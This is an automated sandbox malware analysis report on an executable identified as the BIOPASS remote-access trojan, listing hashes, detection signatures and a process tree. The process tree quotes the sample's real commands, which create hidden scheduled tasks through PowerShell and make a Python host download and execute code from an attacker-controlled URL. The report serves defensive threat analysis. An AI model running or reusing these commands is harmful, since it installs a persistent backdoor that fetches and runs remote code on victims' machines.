Analysis

  • max time kernel
    69s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    12/07/2021, 07:04

General

  • Target

    fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe

  • Size

    4.7MB

  • MD5

    f12a1c138bc56653a09076cba61d392d

  • SHA1

    f20a850162677f244aead08cceae74ecbb5dff37

  • SHA256

    fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851

  • SHA512

    814146e040c905ef10002d9f9edc3b39445aa06070f0934b6b58801eca8cc29838e84b87ab5d9cdc3883bc8cef38a0b7ac4daa0a50c4cb32010977f3d99e8488

Score
10/10

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with Winnti group (APT41).

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 64 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe
    "C:\Users\Admin\AppData\Local\Temp\fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\SysWOW64\ping.exe
      ping baidu.com
      2⤵
      • Runs ping.exe
      PID:1988
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
      2⤵
        PID:1052
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:560
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Windows\SysWOW64\schtasks.exe
          SCHTASKS /Run /TN SYSTEM_SETTINGS
          3⤵
            PID:1724
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\flash.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\flash.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:980
          • C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /Run /TN SYSTEM_TEST
            3⤵
              PID:524
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /DELETE /F /TN SYSTEM_TEST
              3⤵
                PID:1576
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:620
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:112
              • C:\Windows\SysWOW64\schtasks.exe
                SCHTASKS /Run /TN SYSTEM_CDAEMON
                3⤵
                  PID:1616
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {40054A11-7CF3-4EA4-B8D9-2FB99B02E492} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
              1⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:824
              • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
                C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\')).read().decode())')" a a
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:1384
              • C:\Users\Public\flash.exe
                C:\Users\Public\flash.exe
                2⤵
                • Executes dropped EXE
                • Modifies Internet Explorer settings
                • Modifies system certificate store
                • Suspicious use of SetWindowsHookEx
                PID:628
              • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
                C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\')).read().decode())')" a a
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:1028

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/112-176-0x0000000005320000-0x0000000005321000-memory.dmp

              Filesize

              4KB

            • memory/112-178-0x00000000057A0000-0x00000000057A1000-memory.dmp

              Filesize

              4KB

            • memory/112-172-0x0000000004920000-0x0000000004921000-memory.dmp

              Filesize

              4KB

            • memory/112-173-0x00000000048E0000-0x00000000048E1000-memory.dmp

              Filesize

              4KB

            • memory/112-174-0x00000000048E2000-0x00000000048E3000-memory.dmp

              Filesize

              4KB

            • memory/112-175-0x0000000002610000-0x0000000002611000-memory.dmp

              Filesize

              4KB

            • memory/628-86-0x0000000006270000-0x0000000006271000-memory.dmp

              Filesize

              4KB

            • memory/628-67-0x0000000004892000-0x0000000004893000-memory.dmp

              Filesize

              4KB

            • memory/628-66-0x00000000048D0000-0x00000000048D1000-memory.dmp

              Filesize

              4KB

            • memory/628-65-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

              Filesize

              4KB

            • memory/628-68-0x0000000001100000-0x0000000001101000-memory.dmp

              Filesize

              4KB

            • memory/628-64-0x0000000004890000-0x0000000004891000-memory.dmp

              Filesize

              4KB

            • memory/628-63-0x0000000075AF1000-0x0000000075AF3000-memory.dmp

              Filesize

              8KB

            • memory/628-69-0x0000000004770000-0x0000000004771000-memory.dmp

              Filesize

              4KB

            • memory/628-72-0x0000000005620000-0x0000000005621000-memory.dmp

              Filesize

              4KB

            • memory/628-77-0x0000000005690000-0x0000000005691000-memory.dmp

              Filesize

              4KB

            • memory/628-78-0x00000000057E0000-0x00000000057E1000-memory.dmp

              Filesize

              4KB

            • memory/628-79-0x000000007EF30000-0x000000007EF31000-memory.dmp

              Filesize

              4KB

            • memory/628-87-0x00000000062A0000-0x00000000062A1000-memory.dmp

              Filesize

              4KB

            • memory/628-177-0x00000000000F0000-0x00000000000F3000-memory.dmp

              Filesize

              12KB

            • memory/980-157-0x0000000000F80000-0x0000000000F81000-memory.dmp

              Filesize

              4KB

            • memory/980-162-0x0000000005320000-0x0000000005321000-memory.dmp

              Filesize

              4KB

            • memory/980-158-0x0000000004850000-0x0000000004851000-memory.dmp

              Filesize

              4KB

            • memory/980-161-0x0000000005200000-0x0000000005201000-memory.dmp

              Filesize

              4KB

            • memory/980-160-0x0000000001362000-0x0000000001363000-memory.dmp

              Filesize

              4KB

            • memory/980-159-0x0000000001360000-0x0000000001361000-memory.dmp

              Filesize

              4KB

            • memory/980-163-0x0000000005720000-0x0000000005721000-memory.dmp

              Filesize

              4KB